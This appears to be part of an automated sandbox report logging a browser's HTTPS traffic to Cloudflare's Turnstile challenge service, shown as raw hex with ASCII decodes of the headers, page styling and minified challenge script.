                                                                                                                                                                                                                                                                                      2024-10-24 22:05:47 UTC1369INData Raw: 75 72 6e 20 72 3b 66 6f 72 28 76 61 72 20 6e 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 73 63 72 69 70 74 22 29 2c 6f 3d 30 2c 63 3b 63 3d 6e 5b 6f 5d 3b 6f 2b 2b 29 69 66 28 56 28 63 2c 48 54 4d 4c 53 63 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 63 2e 73 72 63 29 29 72 65 74 75 72 6e 20 63 7d 66 75 6e 63 74 69 6f 6e 20 66 72 28 29 7b 76 61 72 20 65 3d 41 74 28 29 3b 65 7c 7c 6d 28 22 43 6f 75 6c 64 20 6e 6f 74 20 66 69 6e 64 20 54 75 72 6e 73 74 69 6c 65 20 73 63 72 69 70 74 20 74 61 67 2c 20 73 6f 6d 65 20 66 65 61 74 75 72 65 73 20 6d 61 79 20 6e 6f 74 20 62 65 20 61 76 61 69 6c 61 62 6c 65 22 2c 34 33 37 37 37 29 3b 76 61 72 20 72 3d 65 2e 73 72 63 2c 6e 3d 7b 6c 6f 61 64 65 64 41 73 79 6e
                                                                                                                                                                                                                                                                                      Data Ascii: urn r;for(var n=document.querySelectorAll("script"),o=0,c;c=n[o];o++)if(V(c,HTMLScriptElement)&&e.test(c.src))return c}function fr(){var e=At();e||m("Could not find Turnstile script tag, some features may not be available",43777);var r=e.src,n={loadedAsyn
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:48 UTC1369INData Raw: 65 64 62 61 63 6b 22 2c 45 2e 69 64 3d 22 63 66 2d 66 72 2d 69 64 22 2c 45 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 45 2e 73 74 79 6c 65 2e 6d 61 78 57 69 64 74 68 3d 22 34 35 30 70 78 22 2c 45 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 52 74 28 72 29 2c 45 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 72 65 6c 61 74 69 76 65 22 2c 45 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 37 22 2c 45 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 2c 45 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 52 61 64 69 75 73 3d 22 35 70 78 22 2c 45 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 70 78 22 2c 45 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 70 78 22 2c 45 2e 73 74 79 6c 65 2e 6f
                                                                                                                                                                                                                                                                                      Data Ascii: edback",E.id="cf-fr-id",E.style.width="100vw",E.style.maxWidth="450px",E.style.height=Rt(r),E.style.position="relative",E.style.zIndex="2147483647",E.style.backgroundColor="#ffffff",E.style.borderRadius="5px",E.style.left="0px",E.style.top="0px",E.style.o


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      12192.168.2.1649724104.18.95.414436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:47 UTC801OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/g5awn/0x4AAAAAAAxU5YQo4UeBLOJu/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                                                                      Referer: https://fkmd.lioninkey.com/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:47 UTC1362INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:05:47 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 26446
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                      permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                                                                      content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                                                                                                                                                                                                                                      cross-origin-embedder-policy: require-corp
                                                                                                                                                                                                                                                                                      cross-origin-opener-policy: same-origin
                                                                                                                                                                                                                                                                                      cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                                                      origin-agent-cluster: ?1
                                                                                                                                                                                                                                                                                      accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                                                                      critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                                                                      referrer-policy: same-origin
                                                                                                                                                                                                                                                                                      document-policy: js-profiling
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:47 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 37 64 34 35 33 36 31 61 64 39 36 63 35 38 2d 44 46 57 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: Server: cloudflareCF-RAY: 8d7d45361ad96c58-DFWalt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:47 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:47 UTC1369INData Raw: 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64
                                                                                                                                                                                                                                                                                      Data Ascii: ding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiased
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:47 UTC1369INData Raw: 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23 30
                                                                                                                                                                                                                                                                                      Data Ascii: troke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#0
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:47 UTC1369INData Raw: 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f
                                                                                                                                                                                                                                                                                      Data Ascii: nge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark #challenge-o
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:47 UTC1369INData Raw: 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e
                                                                                                                                                                                                                                                                                      Data Ascii: .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-helper-loop-lin
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:47 UTC1369INData Raw: 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 7d 74 6f 7b 66 69 6c 6c 3a 23 66
                                                                                                                                                                                                                                                                                      Data Ascii: fset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1303}to{fill:#f
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:47 UTC1369INData Raw: 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 6c 6f 67 6f 7b 68 65 69
                                                                                                                                                                                                                                                                                      Data Ascii: low:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-compact #logo{hei
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:47 UTC1369INData Raw: 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65 78 2d 73 74 61 72 74 3b 6a 75 73 74 69 66
                                                                                                                                                                                                                                                                                      Data Ascii: rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:flex-start;justif
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:47 UTC1369INData Raw: 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 33 70 78 3b 73 74 72 6f 6b 65 2d 6c 69
                                                                                                                                                                                                                                                                                      Data Ascii: ext-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width:3px;stroke-li


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      13192.168.2.1649725104.18.95.414436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:48 UTC730OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8d7d45361ad96c58&lang=auto HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/g5awn/0x4AAAAAAAxU5YQo4UeBLOJu/auto/fbE/normal/auto/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:48 UTC331INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:05:48 GMT
                                                                                                                                                                                                                                                                                      Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 116344
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8d7d453afdfb6b3f-DFW
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:48 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 76 45 73 72 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73
                                                                                                                                                                                                                                                                                      Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.vEsr2={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:48 UTC1369INData Raw: 6f 75 74 70 75 74 5f 73 75 62 74 69 74 6c 65 22 3a 22 59 6f 75 72 25 32 30 66 65 65 64 62 61 63 6b 25 32 30 72 65 70 6f 72 74 25 32 30 68 61 73 25 32 30 62 65 65 6e 25 32 30 73 75 63 63 65 73 73 66 75 6c 6c 79 25 32 30 73 75 62 6d 69 74 74 65 64 22 2c 22 69 6e 76 61 6c 69 64 5f 64 6f 6d 61 69 6e 22 3a 22 49 6e 76 61 6c 69 64 25 32 30 64 6f 6d 61 69 6e 2e 25 32 30 43 6f 6e 74 61 63 74 25 32 30 74 68 65 25 32 30 53 69 74 65 25 32 30 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 30 69 66 25 32 30 74 68 69 73 25 32 30 70 72 6f 62 6c 65 6d 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 6e 6f 74 5f 65 6d 62 65 64 64 65 64 22 3a 22 54 68 69 73 25 32 30 63 68 61 6c 6c 65 6e 67 65 25 32 30 6d 75 73 74 25 32 30 62 65 25 32 30 65 6d 62 65 64 64 65 64 25 32 30 69 6e 74
                                                                                                                                                                                                                                                                                      Data Ascii: output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","not_embedded":"This%20challenge%20must%20be%20embedded%20int
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:48 UTC1369INData Raw: 2f 36 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 36 34 34 29 29 2f 37 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 35 31 33 29 29 2f 38 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 36 31 31 29 29 2f 39 2c 64 3d 3d 3d 66 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 37 35 34 37 31 39 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 4c 28 31 34 36 38 29 5d 2c 65 4f 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 67 4d 2c 66 2c 67 2c 68 2c 69 2c 6a 2c 6b 29 7b 66 6f 72 28 67 4d 3d 67 4c 2c 66 3d 7b 27 73 6f 79 55 41 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 72 65 74 75 72 6e 20 6c 28 29 7d 2c 27 6d 79 4f 75 7a 27
                                                                                                                                                                                                                                                                                      Data Ascii: /6)+-parseInt(gK(644))/7*(-parseInt(gK(513))/8)+-parseInt(gK(611))/9,d===f)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,754719),eM=this||self,eN=eM[gL(1468)],eO=function(c,gM,f,g,h,i,j,k){for(gM=gL,f={'soyUA':function(l){return l()},'myOuz'
